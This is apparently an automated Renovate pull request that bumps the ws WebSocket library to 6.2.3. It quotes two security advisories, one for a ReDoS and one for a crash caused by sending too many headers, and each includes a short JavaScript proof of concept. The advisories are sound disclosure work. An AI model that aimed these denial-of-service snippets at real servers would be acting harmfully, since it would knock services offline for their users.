Update dependency ws to v6.2.3 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
ws	6.2.2 → 6.2.3

---

ReDoS in Sec-Websocket-Protocol header

CVE-2021-32640 / GHSA-6fc8-4gx4-v693

More information

Details

Impact

A specially crafted value of the Sec-Websocket-Protocol header can be used to significantly slow down a ws server.

Proof of concept

for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
  const value = 'b' + ' '.repeat(length) + 'x';
  const start = process.hrtime.bigint();

  value.trim().split(/ *, */);

  const end = process.hrtime.bigint();

  console.log('length = %d, time = %f ns', length, end - start);
}

Patches

The vulnerability was fixed in ws@7.4.6 (websockets/ws@00c425e) and backported to ws@6.2.2 (websockets/ws@78c676d) and ws@5.2.3 (websockets/ws@76d47c1).

Workarounds

In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options.

Credits

The vulnerability was responsibly disclosed along with a fix in private by Robert McLaughlin from University of California, Santa Barbara.

Severity

• CVSS Score: 5.3 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References

• https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693
• https://nvd.nist.gov/vuln/detail/CVE-2021-32640
• https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff
• https://github.com/websockets/ws/issues/1895
• https://lists.apache.org/thread.html/rdfa7b6253c4d6271e31566ecd5f30b7ce1b8fb2c89d52b8c4e0f4e30@​%3Ccommits.tinkerpop.apache.org%3E
• https://security.netapp.com/advisory/ntap-20210706-0005/
• https://github.com/advisories/GHSA-6fc8-4gx4-v693

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

ws affected by a DoS when handling a request with many HTTP headers

CVE-2024-37890 / GHSA-3h5v-q93c-6h6q

More information

Details

Impact

A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6).

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

• GHSA-3h5v-q93c-6h6q
• https://www.cve.org/CVERecord?id=CVE-2024-37890
• https://github.com/websockets/ws/issues/2230
• https://github.com/websockets/ws/pull/2231

Severity

• CVSS Score: 8.7 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

• https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q
• https://github.com/websockets/ws/issues/2230
• https://github.com/websockets/ws/pull/2231
• https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f
• https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e
• https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c
• https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63
• https://github.com/advisories/GHSA-3h5v-q93c-6h6q

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

websockets/ws (ws)

v6.2.3

Compare Source

Bug fixes

• Backported e55e510 to the 6.x release line (eeb76d3).

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.